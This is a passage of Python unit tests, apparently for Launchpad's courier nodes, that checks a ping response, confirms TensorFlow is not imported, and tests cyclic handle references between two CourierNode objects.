self.assertEqual(client.ping(), 'pong')
# Make sure Tensorflow is not imported.
self.assertNotIn('tensorflow', sys.modules)
def test_cyclic_reference(self):
def _foo(bar):
del bar # unused
def _bar(foo):
del foo # unused
foo_node = lp_courier.CourierNode(_foo)
foo_handle = foo_node.create_handle()
bar_node = lp_courier.CourierNode(_bar)
bar_handle = bar_node.create_handle()
self.assertNotIn(foo_handle, bar_node._input_handles)
self.assertNotIn(bar_handle, foo_node._input_handles)
foo_node.configure(bar=bar_handle)
bar_node.configure(foo=foo_handle)
self.assertIn(foo_handle, bar_node._input_handles)
self.assertIn(bar_handle, foo_node._input_handles)
if __name__ == '__main__':
absltest.main()
|